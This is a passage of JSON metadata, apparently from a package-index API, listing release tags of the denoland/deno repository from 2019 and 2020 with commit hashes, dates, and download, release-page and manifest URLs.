e.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hos